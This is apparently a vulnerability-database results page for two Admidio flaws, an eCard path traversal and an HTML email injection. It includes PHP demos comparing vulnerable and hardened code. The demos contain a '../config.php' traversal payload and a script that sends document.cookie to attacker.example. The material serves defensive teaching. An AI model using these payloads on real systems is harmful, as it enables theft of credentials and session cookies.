34 matches found
CVE-2026-41655
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload, e.g.,...
CVE-2026-41655
Summary of CVE-2026-41655 (Admidio): The vulnerability is a path traversal in the ecard_preview.php endpoint. Before version 5.0.9, the ecard_template parameter is not validated as a safe filename, allowing an authenticated user to craft paths like ../config.php to read arbitrary files accessibl...
CVE-2026-41655 Admidio: Path Traversal in ECard Preview Allows Reading Arbitrary Server Files Including Database Credentials
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload, e.g.,...
EUVD-2026-28263
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload, e.g.,...
Admidio Path Traversal Vulnerability
Admidio is an open-source member management system developed by the Admidio team. It supports features such as member lists, event management, message boards, photo albums, and downloads. Admidio versions prior to 5.0.9 contain a path traversal vulnerability. This vulnerability stemmed...
Directory Traversal
Overview: admidio/admidio is a free open source user management system for websites of organizations and groups. Affected versions of this package are vulnerable to Directory Traversal via the ecard_preview.php process. An attacker can access arbitrary files on the server, including sensitive...
Admidio has Path Traversal in ECard Preview that Allows Reading Arbitrary Server Files Including Database Credentials
Summary: The ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload, e.g., ../config.php, to read arbitrary files accessible to the web server process...
GHSA-m3vp-3jjm-gpmx Admidio has Path Traversal in ECard Preview that Allows Reading Arbitrary Server Files Including Database Credentials
Summary: The ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload, e.g., ../config.php, to read arbitrary files accessible to the web server process...
PT-2026-37139
Name of the Vulnerable Software and Affected Versions: Admidio versions prior to 5.0.9. Description: The ecard_preview.php endpoint fails to validate that the ecard_template POST parameter is a safe filename before it is processed by the getEcardTemplate function. An authenticated user can exploit...
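The entries above all describe the same defect: a POST-supplied template name reaches a filesystem read without being checked. The following PHP is an added example, not Admidio's own code; it places the unchecked pattern beside a hardened lookup. The directory layout, the ".tpl" extension, the config file contents and the function names are assumptions made for this demo.

```php
<?php
declare(strict_types=1);
// Added example, not Admidio's own code. Shows the unchecked-filename
// pattern described for CVE-2026-41655 next to a hardened lookup. The
// directory layout, the ".tpl" extension and the file contents are
// assumptions made for this demo.

// Vulnerable pattern: the POST parameter is joined onto the template
// directory as-is, so "../" segments walk out of that directory.
function templatePathUnsafe(string $templateDir, string $name): string
{
    return $templateDir . '/' . $name;
}

// Hardened lookup: accept only a bare file name with a conservative
// character set, then require the canonical path to stay inside the
// canonical template directory. Returns null on any failure.
function templatePathSafe(string $templateDir, string $name): ?string
{
    if (preg_match('/\A[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.tpl\z/', $name) !== 1) {
        return null; // not a plain "name.tpl"
    }
    $base = realpath($templateDir);
    $full = realpath($templateDir . '/' . $name);
    if ($base === false || $full === false) {
        return null; // directory or template does not exist
    }
    // Prefix check on resolved paths also catches symlinks pointing outside.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed install tree: a template folder next to a config file that
// holds a credential, mirroring what the advisory says becomes readable.
$root   = sys_get_temp_dir() . '/ecard_demo_' . bin2hex(random_bytes(4));
$tplDir = $root . '/ecard_templates';
mkdir($tplDir, 0700, true);
file_put_contents($tplDir . '/birthday.tpl', "<p>Happy birthday!</p>\n");
file_put_contents($root . '/config.php', "<?php \$dbPassword = 'demo-secret'; // constructed\n");

// Two submitted values: a legitimate template and the traversal payload.
foreach (['birthday.tpl', '../config.php'] as $submitted) {
    $unsafe = templatePathUnsafe($tplDir, $submitted);
    $safe   = templatePathSafe($tplDir, $submitted);
    printf("%-15s unsafe -> %-12s safe -> %s\n",
        $submitted,
        is_file($unsafe) ? basename($unsafe) : 'no file',
        $safe === null ? 'rejected' : basename($safe));
}

// Clean up the demo tree.
unlink($tplDir . '/birthday.tpl');
unlink($root . '/config.php');
rmdir($tplDir);
rmdir($root);
```

Run with `php demo.php`: the unsafe join resolves `../config.php` to a real file one level above the template directory, while the hardened lookup rejects it at the filename check before the filesystem is consulted. The realpath prefix comparison is the second line of defence for cases the regex cannot see, such as a symlink inside the template directory that points elsewhere.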
Admidio Cross-Site Scripting Vulnerability
Admidio is an open-source member management system developed by the Admidio team. It supports features such as member lists, event management, message boards, photo albums, and downloads. Admidio versions 5.0.6 and earlier contain a cross-site scripting vulnerability. This...
CVE-2026-32757 Admidio: HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses the raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject...
CVE-2026-32757
Admidio eCard HTML email injection vulnerability (CVE-2026-32757) arises from using the raw POST message instead of the HTMLPurifier-sanitized value when constructing the eCard HTML. The sanitize step runs during form validation but the sanitized value is never used; the template then embeds the ...
GHSA-4wr4-f2qf-x5wj Admidio has an HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Summary: The eCard send handler in Admidio uses the raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent t...
Cross-site Scripting (XSS)
Overview: admidio/admidio is a free open source user management system for websites of organizations and groups. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in the ecard_message handling process. An attacker can inject arbitrary HTML and JavaScript into greeting car...
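The CVE-2026-32757 entries describe a data-flow mistake rather than a weak sanitizer: the message is purified during validation, but the handler then reads the raw request value. The following PHP is an added example, not Admidio's own code. htmlspecialchars() stands in for HTMLPurifier, which is not bundled here and would instead keep a safe HTML subset; the FormValidator class, the buildEcardHtml* functions and the request body are assumptions made for this demo, while the field name follows the advisory.

```php
<?php
declare(strict_types=1);
// Added example, not Admidio's own code. Reproduces the data-flow mistake
// described for CVE-2026-32757: the form is validated and the message
// sanitized, but the handler reads the raw POST value and the sanitized
// copy is never used. htmlspecialchars() stands in for HTMLPurifier (not
// bundled here); class, function names and the request body are assumed.

final class FormValidator
{
    /** @param array<string,string> $post  @return array<string,string> */
    public function validate(array $post): array
    {
        $sanitized = [];
        foreach ($post as $field => $value) {
            // Stand-in for HTMLPurifier::purify(): every tag is neutralised.
            $sanitized[$field] = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        }
        return $sanitized;
    }
}

// Vulnerable handler: $formValues is built and then ignored; the card HTML
// is assembled from the untouched request body.
function buildEcardHtmlVulnerable(array $post): string
{
    $formValues = (new FormValidator())->validate($post);
    return '<div class="ecard">' . $post['ecard_message'] . '</div>';
}

// Fixed handler: the sanitized array is the only source of message text.
function buildEcardHtmlFixed(array $post): string
{
    $formValues = (new FormValidator())->validate($post);
    return '<div class="ecard">' . $formValues['ecard_message'] . '</div>';
}

// Regression check a reviewer could keep: no raw tag may survive into the
// card body, because that body is sent as an HTML e-mail to the recipient.
function containsRawMarkup(string $html): bool
{
    $body = substr($html, strlen('<div class="ecard">'), -strlen('</div>'));
    return preg_match('/<[a-z]/i', $body) === 1;
}

// Constructed request body: a greeting followed by an injected script.
$post = [
    'ecard_message' => 'Congratulations!<script>new Image().src='
        . '"https://attacker.example/?c="+encodeURIComponent(document.cookie)</script>',
];

foreach (['buildEcardHtmlVulnerable', 'buildEcardHtmlFixed'] as $handler) {
    $html = $handler($post);
    printf("%-24s raw markup: %s\n%s\n\n", $handler,
        containsRawMarkup($html) ? 'YES' : 'no', $html);
}
```

The vulnerable handler reports raw markup because the `<script>` element passes straight into the card; the fixed handler emits `&lt;script&gt;` instead. The lesson for review is to treat the validator's return value as the only acceptable source of user text after validation, and to flag any later read of `$_POST` for a field the validator already covered.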